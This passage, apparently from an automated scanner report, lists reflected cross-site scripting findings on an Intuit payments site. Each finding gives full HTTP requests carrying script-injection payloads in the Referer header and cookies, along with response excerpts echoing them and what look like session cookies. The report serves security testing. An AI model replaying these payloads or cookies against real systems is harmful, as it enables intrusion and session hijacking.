           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec';
                   </script>
...[SNIP]...

1.60. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 38485--><script>alert(1)</script>074023fb5c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=38485--><script>alert(1)</script>074023fb5c0

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=deElcMZz9r2VrFsUqfo9UQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960A9370A0805192AA117E3EA41B33F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116418


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=38485--><script>alert(1)</script>074023fb5c0 | -->
...[SNIP]...

1.61. http://payments.intuit.com/support/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8809e--><script>alert(1)</script>275e11ad70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=TDJVadNr8+ViGI-INyH2Zw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D33000A0805192AA117E3C409CD4F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98228


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b | -->
...[SNIP]...

1.62. http://payments.intuit.com/support/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dceb5'-alert(1)-'94b519c31b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:12 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UGJvXvyLwdoaSfkAAlbu1A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:13 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CFABC0A0805192AA117E39292EB50
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98195


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1';
                   </script>
...[SNIP]...

1.63. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef888'-alert(1)-'bf789d01126 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3dnIEVlZcZgtxMibVwZkxA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CB3660A0805192AA117E30609CB68
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140104


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126';
                   </script>
...[SNIP]...

1.64. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 93b01--><script>alert(1)</script>d9ed33811bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=93b01--><script>alert(1)</script>d9ed33811bf

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:05 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=g1QXXAHB2GhfRtmgIA-0mQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:06 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CDE020A0805192AA117E34818FE92
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140135


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=93b01--><script>alert(1)</script>d9ed33811bf | -->
...[SNIP]...

1.65. http://payments.intuit.com/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262dd"><script>alert(1)</script>f39fea87c00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16262dd"><script>alert(1)</script>f39fea87c00;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:54:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=gEMO0Uj6PkBJ7DxotzGYwA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:31:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95680780A0805192AA117E3A2F56F6B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108446


                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16262dd"><script>alert(1)</script>f39fea87c00" type="hidden" />
...[SNIP]...

1.66. http://payments.intuit.com/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 54b80<script>alert(1)</script>618aff7c52b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1654b80<script>alert(1)</script>618aff7c52b;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:55:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=EB3K6xHPm8Z4gMMc+8FP8A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:32:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D957C7D80A0805192AA117E33B1438DB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108431


                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T1654b80<script>alert(1)</script>618aff7c52b<br />
...[SNIP]...

1.67. http://payments.intuit.com/apply-now/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bfc"><script>alert(1)</script>2691f2a62ad was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
